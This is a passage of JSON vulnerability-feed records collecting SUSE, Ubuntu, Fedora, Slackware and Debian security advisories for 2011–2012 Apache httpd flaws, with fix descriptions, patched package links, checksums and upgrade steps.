(FATE#311973). See the\n SSLStrictSNIVHostCheck directive as documented in\n /usr/share/apache2/manual/mod/mod_ssl.html.en\n\n Also the patch for the ByteRange remote denial of service\n attack (CVE-2011-3192) was refined and the configuration\n options used by upstream were added.\n\n Introduce new config option: Allow MaxRanges Number of\n ranges requested, if exceeded, the complete content is\n served. default: 200 0|unlimited: unlimited none: Range\n headers are ignored. This option is a backport from 2.2.21.\n\n Also fixed were\n\n * CVE-2011-3348: Denial of service in proxy_ajp when\n using a undefined method.\n * CVE-2011-3368: Exposure of internal servers via\n reverse proxy methods with mod_proxy enabled and incorrect\n Rewrite or Proxy Rules.\n\n This update also includes a newer\n apache2-vhost-ssl.template, which disables SSLv2, and\n allows SSLv3 and strong ciphers only. Please note that\n existing vhosts will not be converted.\n", "edition": 1, "modified": "2011-11-04T09:08:25", "published": "2011-11-04T09:08:25", "id": "SUSE-SU-2011:1215-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00007.html", "title": "Security update for Apache2 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0419", "CVE-2011-3368", "CVE-2010-1623", "CVE-2011-3192", "CVE-2011-1928"], "description": "This update fixes several security issues in the Apache2\n webserver.\n\n *\n\n The severe ByteRange remote denial of service attack\n (CVE-2011-3192) was fixed, configuration options used by\n upstream were added.\n\n Introduce new config option: Allow MaxRanges Number\n of ranges requested, if exceeded, the complete content is\n served. default: 200 0|unlimited: unlimited none: Range\n headers are ignored. This option is a backport from 2.2.21.\n\n *\n\n CVE-2011-0419,CVE-2011-1928: Two fnmatch denial of\n service attacks were fixed that could exhaust the servers\n memory.\n\n *\n\n CVE-2010-1623: Another memoryleak was fixed that\n could exhaust httpd server memory via unspecified methods.\n\n *\n\n CVE-2011-3368: This update also includes fixes a fix\n for a mod_proxy reverse exposure via RewriteRule or\n ProxyPassMatch directives.\n", "edition": 1, "modified": "2011-11-09T19:08:34", "published": "2011-11-09T19:08:34", "id": "SUSE-SU-2011:1229-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00011.html", "title": "Security update for apache2 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:34:36", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-1176", "CVE-2011-3348"], "description": "It was discovered that the mod_proxy module in Apache did not properly \ninteract with the RewriteRule and ProxyPassMatch pattern matches \nin the configuration of a reverse proxy. This could allow remote \nattackers to contact internal webservers behind the proxy that were \nnot intended for external exposure. (CVE-2011-3368)\n\nStefano Nichele discovered that the mod_proxy_ajp module in Apache when \nused with mod_proxy_balancer in certain configurations could allow \nremote attackers to cause a denial of service via a malformed HTTP \nrequest. (CVE-2011-3348)\n\nSamuel Montosa discovered that the ITK Multi-Processing Module for \nApache did not properly handle certain configuration sections that \nspecify NiceValue but not AssignUserID, preventing Apache from dropping \nprivileges correctly. This issue only affected Ubuntu 10.04 LTS, Ubuntu \n10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\nUSN 1199-1 fixed a vulnerability in the byterange filter of Apache. The \nupstream patch introduced a regression in Apache when handling specific \nbyte range requests. This update fixes the issue.\n\nOriginal advisory details:\n\nA flaw was discovered in the byterange filter in Apache. A remote attacker \ncould exploit this to cause a denial of service via resource exhaustion.", "edition": 5, "modified": "2011-11-11T00:00:00", "published": "2011-11-11T00:00:00", "id": "USN-1259-1", "href": "https://ubuntu.com/security/notices/USN-1259-1", "title": "Apache vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2012-02-21T01:28:42", "published": "2012-02-21T01:28:42", "id": "FEDORA:4529E211C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: httpd-2.2.22-1.fc16", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "description": "New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. The apr-util package has also been\nupdated to the latest version.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/apr-util-1.4.1-i486-1_slack13.37.txz: Upgraded.\n Version bump for httpd upgrade.\npatches/packages/httpd-2.2.22-i486-1_slack13.37.txz: Upgraded.\n *) SECURITY: CVE-2011-3368 (cve.mitre.org)\n Reject requests where the request-URI does not match the HTTP\n specification, preventing unexpected expansion of target URLs in\n some reverse proxy configurations. [Joe Orton]\n *) SECURITY: CVE-2011-3607 (cve.mitre.org)\n Fix integer overflow in ap_pregsub() which, when the mod_setenvif module\n is enabled, could allow local users to gain privileges via a .htaccess\n file. [Stefan Fritsch, Greg Ames]\n *) SECURITY: CVE-2011-4317 (cve.mitre.org)\n Resolve additional cases of URL rewriting with ProxyPassMatch or\n RewriteRule, where particular request-URIs could result in undesired\n backend network exposure in some configurations.\n [Joe Orton]\n *) SECURITY: CVE-2012-0021 (cve.mitre.org)\n mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format\n string is in use and a client sends a nameless, valueless cookie, causing\n a denial of service. The issue existed since version 2.2.17. PR 52256.\n [Rainer Canavan &lt;rainer-apache 7val com&gt;]\n *) SECURITY: CVE-2012-0031 (cve.mitre.org)\n Fix scoreboard issue which could allow an unprivileged child process\n could cause the parent to crash at shutdown rather than terminate\n cleanly. [Joe Orton]\n *) SECURITY: CVE-2012-0053 (cve.mitre.org)\n Fix an issue in error responses that could expose \"httpOnly\" cookies\n when no custom ErrorDocument is specified for status code 400.\n [Eric Covener]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-util-1.4.1-i486-1_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/httpd-2.2.22-i486-1_slack12.0.tgz\n\nUpdated packages for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-util-1.4.1-i486-1_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/httpd-2.2.22-i486-1_slack12.1.tgz\n\nUpdated packages for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-util-1.4.1-i486-1_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/httpd-2.2.22-i486-1_slack12.2.tgz\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-util-1.4.1-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.22-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-util-1.4.1-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.22-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-util-1.4.1-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.22-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-util-1.4.1-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.22-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-util-1.4.1-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.22-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-util-1.4.1-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.22-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-util-1.4.1-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.2.22-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-util-1.4.1-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.2.22-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 packages:\n3143affee7e89d16a2f5b4f58f1f2c9d apr-util-1.4.1-i486-1_slack12.0.tgz\n86c2b71a544c9533794951f718bd907b httpd-2.2.22-i486-1_slack12.0.tgz\n\nSlackware 12.1 packages:\naab31157fa672bb2bc11851b486c9d5c apr-util-1.4.1-i486-1_slack12.1.tgz\n1362ef9a9b2d355e1cf9b5c7e0ae0607 httpd-2.2.22-i486-1_slack12.1.tgz\n\nSlackware 12.2 packages:\nf30f1f0a949f321b6aefb99a703eca3f apr-util-1.4.1-i486-1_slack12.2.tgz\n18fd6ddd6e6bbf4a7222ade821ec1aa1 httpd-2.2.22-i486-1_slack12.2.tgz\n\nSlackware 13.0 packages:\nd3600fef7f1cabb62554417567fb55ab apr-util-1.4.1-i486-1_slack13.0.txz\n0456c808efb92da333942ff939746d77 httpd-2.2.22-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nd15c2e0a4aa074bbadfa50099da482b2 apr-util-1.4.1-x86_64-1_slack13.0.txz\n1b72685b2519bbf167973d88dce562e1 httpd-2.2.22-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n9c7c2bb99c99f3a6275f0dc9636ce38c apr-util-1.4.1-i486-1_slack13.1.txz\n49a5e4a73be2328d80cca186efe2f6f7 httpd-2.2.22-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n4f9dcb6495c04d3094cc68050440505b apr-util-1.4.1-x86_64-1_slack13.1.txz\n1f378f8a4d990d7298e0155b22cfcf19 httpd-2.2.22-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7feb382700511d72737c5a31e91ee56e apr-util-1.4.1-i486-1_slack13.37.txz\n783de593b5827c8601e2b486cf98397f httpd-2.2.22-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n1bd4b3df67a0449f3015e82e47cd808d apr-util-1.4.1-x86_64-1_slack13.37.txz\n8999903e736cbb29c055ea2bf66cfed1 httpd-2.2.22-x86_64-1_slack13.37.txz\n\nSlackware -current packages:\ne709c8056cede91c35fd354ad5b654df l/apr-util-1.4.1-i486-1.txz\n97c295a42d4678537c62d6ce54d3e1fa n/httpd-2.2.22-i486-1.txz\n\nSlackware x86_64 -current packages:\n55fdf36b05ff7e82aa9a015289290424 l/apr-util-1.4.1-x86_64-1.txz\n09daa138b81fbf877596e4abc2a01bb6 n/httpd-2.2.22-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg apr-util-1.4.1-i486-1_slack13.37.txz httpd-2.2.22-i486-1_slack13.37.txz\n\nThen, restart the httpd daemon.", "modified": "2012-02-10T17:43:57", "published": "2012-02-10T17:43:57", "id": "SSA-2012-041-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.792124", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:16:21", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2405-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nFebruary 06, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : multiple issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-3607 CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 \n CVE-2012-0031 CVE-2012-0053 \n\nSeveral vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\n An integer overflow in ap_pregsub() could allow local attackers to\n execute arbitrary code at elevated privileges via crafted .htaccess\n files.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\n The Apache HTTP Server did not properly validate the request URI for\n proxied requests. In certain reverse proxy configurations using the\n ProxyPassMatch directive or using the RewriteRule directive with the\n [P] flag, a remote attacker could make the proxy connect to an\n arbitrary server. The could allow the attacker to access internal\n servers that are not otherwise accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append arbitrary\n strings to the host or port parts of the target URI. For example, the\n configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations:\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1\n ProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\n An apache2 child process could cause the parent process to crash\n during shutdown. This is a violation of the privilege separation\n between the apache2 processes and could potentially be used to worsen\n the impact of other vulnerabilities.\n\nCVE-2012-0053:\n\n The response message for error code 400 (bad request) could be used to\n expose &quot;httpOnly&quot; cookies. This could allow a remote attacker using\n cross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2012-02-06T09:24:08", "published": "2012-02-06T09:24:08", "id": "DEBIAN:DSA-2405-1:AE657", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00031.html", "title": "[SECURITY] [DSA 2405-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}